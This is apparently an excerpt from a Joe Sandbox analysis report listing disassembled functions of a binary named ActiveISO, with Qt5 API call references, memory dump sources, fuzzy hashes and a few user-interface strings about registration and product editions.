                                                                                                                    • Part of subcall function 00007FF6537498C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653749993
                                                                                                                    • Part of subcall function 00007FF6537498C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF6537499A4
                                                                                                                    • Part of subcall function 00007FF6537498C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF6537499B4
                                                                                                                    • Part of subcall function 00007FF6537498C0: ?setPage@QWizard@@QEAAXHPEAVQWizardPage@@@Z.QT5WIDGETS ref: 00007FF6537499E7
                                                                                                                    • Part of subcall function 00007FF6537498C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653749A0A
                                                                                                                    • Part of subcall function 00007FF6537498C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653749A1A
                                                                                                                    • Part of subcall function 00007FF6537498C0: ?setPage@QWizard@@QEAAXHPEAVQWizardPage@@@Z.QT5WIDGETS ref: 00007FF653749A3D
                                                                                                                  • ?exec@QDialog@@UEAAHXZ.QT5WIDGETS ref: 00007FF65374526D
                                                                                                                    • Part of subcall function 00007FF653744620: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653744681
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653745298
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537452A6
                                                                                                                  • ??1QWizard@@UEAA@XZ.QT5WIDGETS ref: 00007FF6537452B1
                                                                                                                    • Part of subcall function 00007FF6537446A0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537446BC
                                                                                                                    • Part of subcall function 00007FF6537446A0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537446E0
                                                                                                                    • Part of subcall function 00007FF6537446A0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653744700
                                                                                                                    • Part of subcall function 00007FF6537446A0: ?currentDate@QDate@@SA?AV1@XZ.QT5CORE ref: 00007FF65374472B
                                                                                                                    • Part of subcall function 00007FF6537446A0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653744938
                                                                                                                    • Part of subcall function 00007FF6537446A0: ??1QSettings@@UEAA@XZ.QT5CORE ref: 00007FF653744946
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: V0@@$Array@@Byte$String@@$Wizard@@$?from?setArrayAscii_helper@Data@Page@Page@@@TypedWizard$?current?exec@Date@Date@@Dialog@@Flags@Qt@@@@@Settings@@Type@Widget@@Window
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 822671528-0
                                                                                                                  • Opcode ID: b025e60de575bdb360e2aebcddecf0858fbaa26b625f4a4a1814e70ca7737951
                                                                                                                  • Instruction ID: 7733773a7956049230bbbf08bdeb4974dab2a5d78251562585111b96dc3417a9
                                                                                                                  • Opcode Fuzzy Hash: b025e60de575bdb360e2aebcddecf0858fbaa26b625f4a4a1814e70ca7737951
                                                                                                                  • Instruction Fuzzy Hash: 67215821D28A46A5EA509B50F8423F97722FF81BA1F480131E99DB69A4DF3CE54DC744
                                                                                                                  APIs
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF6537452F4
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF65374530C
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653745324
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF65374533C
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653745351
                                                                                                                    • Part of subcall function 00007FF6537498C0: ??0QWizard@@QEAA@PEAVQWidget@@V?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS ref: 00007FF653749903
                                                                                                                    • Part of subcall function 00007FF6537498C0: ??0QString@@QEAA@XZ.QT5CORE ref: 00007FF653749923
                                                                                                                    • Part of subcall function 00007FF6537498C0: ??0QString@@QEAA@XZ.QT5CORE ref: 00007FF65374992E
                                                                                                                    • Part of subcall function 00007FF6537498C0: ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FF653749940
                                                                                                                    • Part of subcall function 00007FF6537498C0: ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FF653749951
                                                                                                                    • Part of subcall function 00007FF6537498C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653749972
                                                                                                                    • Part of subcall function 00007FF6537498C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653749982
                                                                                                                    • Part of subcall function 00007FF6537498C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653749993
                                                                                                                    • Part of subcall function 00007FF6537498C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF6537499A4
                                                                                                                    • Part of subcall function 00007FF6537498C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF6537499B4
                                                                                                                    • Part of subcall function 00007FF6537498C0: ?setPage@QWizard@@QEAAXHPEAVQWizardPage@@@Z.QT5WIDGETS ref: 00007FF6537499E7
                                                                                                                    • Part of subcall function 00007FF6537498C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653749A0A
                                                                                                                    • Part of subcall function 00007FF6537498C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653749A1A
                                                                                                                    • Part of subcall function 00007FF6537498C0: ?setPage@QWizard@@QEAAXHPEAVQWizardPage@@@Z.QT5WIDGETS ref: 00007FF653749A3D
                                                                                                                  • ?exec@QDialog@@UEAAHXZ.QT5WIDGETS ref: 00007FF65374538A
                                                                                                                    • Part of subcall function 00007FF653744620: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653744681
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537453B0
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537453BE
                                                                                                                  • ??1QWizard@@UEAA@XZ.QT5WIDGETS ref: 00007FF6537453C9
                                                                                                                    • Part of subcall function 00007FF6537446A0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537446BC
                                                                                                                    • Part of subcall function 00007FF6537446A0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537446E0
                                                                                                                    • Part of subcall function 00007FF6537446A0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653744700
                                                                                                                    • Part of subcall function 00007FF6537446A0: ?currentDate@QDate@@SA?AV1@XZ.QT5CORE ref: 00007FF65374472B
                                                                                                                    • Part of subcall function 00007FF6537446A0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653744938
                                                                                                                    • Part of subcall function 00007FF6537446A0: ??1QSettings@@UEAA@XZ.QT5CORE ref: 00007FF653744946
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: V0@@$Array@@Byte$String@@$Wizard@@$?from?setArrayAscii_helper@Data@Page@Page@@@TypedWizard$?current?exec@Date@Date@@Dialog@@Flags@Qt@@@@@Settings@@Type@Widget@@Window
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 822671528-0
                                                                                                                  • Opcode ID: 81a7511c2bf4e8223e530a92524347d141314f4d36c6f2dfa86e9642748393e0
                                                                                                                  • Instruction ID: 0a9c8576d8ba6bac58f57250c12007b7fec6502f265f1e37abc899d4c6fae9dc
                                                                                                                  • Opcode Fuzzy Hash: 81a7511c2bf4e8223e530a92524347d141314f4d36c6f2dfa86e9642748393e0
                                                                                                                  • Instruction Fuzzy Hash: 5E219122D28A46A5EA109B50F8423F97326FF80B64F880131E59DB3AE4EF7CE54DC744
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Array$?fromAscii_helper@Data@String@@TypedWidget@@$?allocate@?current?show@?start@AllocationData@@Data@@@@@Flags@Index@Option@Priority@1@@Thread@@U1@_
                                                                                                                  • String ID: Populating the file tree
                                                                                                                  • API String ID: 3670618812-3242387811
                                                                                                                  • Opcode ID: c825e7240d9bcc38105d466f64a84b917f17a3afbabbe8096cddc0589d3635c2
                                                                                                                  • Instruction ID: 922f36a353a1cc94de8fee7c911b4dce8b2c1dc703b8bfb9f5884753a4d9dfbf
                                                                                                                  • Opcode Fuzzy Hash: c825e7240d9bcc38105d466f64a84b917f17a3afbabbe8096cddc0589d3635c2
                                                                                                                  • Instruction Fuzzy Hash: F5418332E24A8782EB00DB25E9822ED7763FB84F94F484132DA4DB7A65CF38E455C744
                                                                                                                  APIs
                                                                                                                  • ?text@QLineEdit@@QEBA?AVQString@@XZ.QT5WIDGETS ref: 00007FF653754B3B
                                                                                                                    • Part of subcall function 00007FF6537422C0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537422DB
                                                                                                                    • Part of subcall function 00007FF6537422C0: ??0QVariant@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FF6537422FE
                                                                                                                    • Part of subcall function 00007FF6537422C0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653742311
                                                                                                                    • Part of subcall function 00007FF6537422C0: ?setValue@QSettings@@QEAAXAEBVQString@@AEBVQVariant@@@Z.QT5CORE ref: 00007FF65374232B
                                                                                                                    • Part of subcall function 00007FF6537422C0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742337
                                                                                                                    • Part of subcall function 00007FF6537422C0: ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FF653742343
                                                                                                                    • Part of subcall function 00007FF6537422C0: ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FF653742353
                                                                                                                    • Part of subcall function 00007FF6537422C0: ??1QSettings@@UEAA@XZ.QT5CORE ref: 00007FF65374235F
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653754B50
                                                                                                                  • ?text@QLineEdit@@QEBA?AVQString@@XZ.QT5WIDGETS ref: 00007FF653754B5F
                                                                                                                    • Part of subcall function 00007FF6537425E0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537425FB
                                                                                                                    • Part of subcall function 00007FF6537425E0: ??0QVariant@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FF65374261E
                                                                                                                    • Part of subcall function 00007FF6537425E0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653742631
                                                                                                                    • Part of subcall function 00007FF6537425E0: ?setValue@QSettings@@QEAAXAEBVQString@@AEBVQVariant@@@Z.QT5CORE ref: 00007FF65374264B
                                                                                                                    • Part of subcall function 00007FF6537425E0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742657
                                                                                                                    • Part of subcall function 00007FF6537425E0: ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FF653742663
                                                                                                                    • Part of subcall function 00007FF6537425E0: ??1QSettings@@UEAA@XZ.QT5CORE ref: 00007FF65374266F
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653754B74
                                                                                                                    • Part of subcall function 00007FF653754C60: ?tr@QMetaObject@@QEBA?AVQString@@PEBD0H@Z.QT5CORE ref: 00007FF653754C86
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS ref: 00007FF653754BA1
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653754BAD
                                                                                                                  Strings
                                                                                                                  • Registration error. Probably you are off-line. Please try to register later on., xrefs: 00007FF653754B88
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?fromArrayAscii_helper@Data@Settings@@TypedVariant@@$?setString@@@$?text@Edit@@LineValue@Variant@@@$?tr@Label@@MetaObject@@Text@V0@@
                                                                                                                  • String ID: Registration error. Probably you are off-line. Please try to register later on.
                                                                                                                  • API String ID: 881635713-994073647
                                                                                                                  • Opcode ID: a92552230e02392d5cdcab635dc1ed2bef033f5bcd43a90758ff35339c1b6b92
                                                                                                                  • Instruction ID: 1cb91e07e87282331b4dac7d91a232f60581a37ced6d6dbfde183ef855e00ff7
                                                                                                                  • Opcode Fuzzy Hash: a92552230e02392d5cdcab635dc1ed2bef033f5bcd43a90758ff35339c1b6b92
                                                                                                                  • Instruction Fuzzy Hash: A811C632E28A4292EA00DB74E8561796322FBC6F64F540230DA6EB36F4DF2CD845C748
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF653743750: ?toLatin1@QString@@QEHAA?AVQByteArray@@XZ.QT5CORE ref: 00007FF65374377C
                                                                                                                    • Part of subcall function 00007FF653743750: ?data@QByteArray@@QEAAPEADXZ.QT5CORE ref: 00007FF653743786
                                                                                                                    • Part of subcall function 00007FF653743750: ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FF6537437A3
                                                                                                                    • Part of subcall function 00007FF653743750: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537437AF
                                                                                                                  • ?tr@QObject@@SA?AVQString@@PEBD0H@Z.QT5CORE ref: 00007FF653743816
                                                                                                                  • ?tr@QObject@@SA?AVQString@@PEBD0H@Z.QT5CORE ref: 00007FF65374382C
                                                                                                                  • ?tr@QObject@@SA?AVQString@@PEBD0H@Z.QT5CORE ref: 00007FF653743852
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?tr@Array@@ByteObject@@$?data@Latin1@
                                                                                                                  • String ID: Professional$Reserved$Standard$Ultimate
                                                                                                                  • API String ID: 668302157-1450032794
                                                                                                                  • Opcode ID: 34c7123c387dfe0ecacb507e3df9238988c5b4eb64e2b9b4575f75882f1dad5e
                                                                                                                  • Instruction ID: 325bd99d864b41885f8cdfa1892008a3ecac2841e183567070366f5dedb80abc
                                                                                                                  • Opcode Fuzzy Hash: 34c7123c387dfe0ecacb507e3df9238988c5b4eb64e2b9b4575f75882f1dad5e
                                                                                                                  • Instruction Fuzzy Hash: 6BF081B5E7851792FA154B6CA8075345213EB85F61F8C1230CC9CB66F0CF2CF195D658
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclosefreadmemmove$ferrorfopen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1875453891-0
                                                                                                                  • Opcode ID: d9904604504b017b3ef2998c84aa01e2ed1ccaab326888a1cd82b073a4eff93c
                                                                                                                  • Instruction ID: 89b3e73948b0861f65aeeb6b10c662d5ec765f77adf59e064797fbffd5cbfd13
                                                                                                                  • Opcode Fuzzy Hash: d9904604504b017b3ef2998c84aa01e2ed1ccaab326888a1cd82b073a4eff93c
                                                                                                                  • Instruction Fuzzy Hash: 2441C661F29A8541FA208B14E4553A6A392FF84FA4F480531CD9DB3BD9EF3CD5058B48
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fseek$fclosefopenftell
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 821468074-0
                                                                                                                  • Opcode ID: 5dba9a39f883ec494b8d025897bbc9bfce0b9454552967f75ad03f0e7c8db5bc
                                                                                                                  • Instruction ID: 4ada63ce8cf7fe83c2cffbf5bce0d249d99322f769af11362054a4e280e282dd
                                                                                                                  • Opcode Fuzzy Hash: 5dba9a39f883ec494b8d025897bbc9bfce0b9454552967f75ad03f0e7c8db5bc
                                                                                                                  • Instruction Fuzzy Hash: 6621B721F29A4285F615DB25EC263B9A392EF89FB4F4C0131D90EB7794DE2CE5548B08
                                                                                                                  APIs
                                                                                                                  • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,00007FF653713799), ref: 00007FF6537143DA
                                                                                                                  • ?detach_grow@QListData@@QEAAPEAUData@1@PEAHH@Z.QT5CORE(?,?,?,00007FF653713799), ref: 00007FF6537143EE
                                                                                                                  • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,00007FF653713799), ref: 00007FF6537143FF
                                                                                                                  • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,00007FF653713799), ref: 00007FF653714411
                                                                                                                  • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,00007FF653713799), ref: 00007FF653714435
                                                                                                                  • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,00007FF653713799), ref: 00007FF653714441
                                                                                                                  • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,?,?,00007FF653713799), ref: 00007FF65371447E
                                                                                                                  • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,00007FF653713799), ref: 00007FF653714487
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Data@@List$?begin@$?detach_grow@?dispose@?end@Data@1@Data@1@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2885242468-0
                                                                                                                  • Opcode ID: 7ec03a7a7749af84652383787b6cd476530cc59b8498ae08b7d64063d64a1ba0
                                                                                                                  • Instruction ID: df2808ca0997fdd293fed9e5104c102c79a8c2fd39d13243e154c2b57c36eb30
                                                                                                                  • Opcode Fuzzy Hash: 7ec03a7a7749af84652383787b6cd476530cc59b8498ae08b7d64063d64a1ba0
                                                                                                                  • Instruction Fuzzy Hash: 87210432E15B4381EA109FA2A851478A761FF85FE6F484530DE0DB33A4DE3CD595CB04
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?set$?fromArrayAscii_helper@Data@Label@@String@@@Text@Typed$?stop@Bar@@ProgressTimer@@Value@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3169276203-0
                                                                                                                  • Opcode ID: 25610a1d47dbcae25dd59418d575729c7182c2d2001a46fff6cbec319f02ee8d
                                                                                                                  • Instruction ID: 3182a516499056a83f8afac235b10d8b990b13a24828ea34ad34f579195ec6bb
                                                                                                                  • Opcode Fuzzy Hash: 25610a1d47dbcae25dd59418d575729c7182c2d2001a46fff6cbec319f02ee8d
                                                                                                                  • Instruction Fuzzy Hash: 4F112122E38A81C2E744DB65E48616D7362FF88F48F491031EA4EA6664DF3CD589C784
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
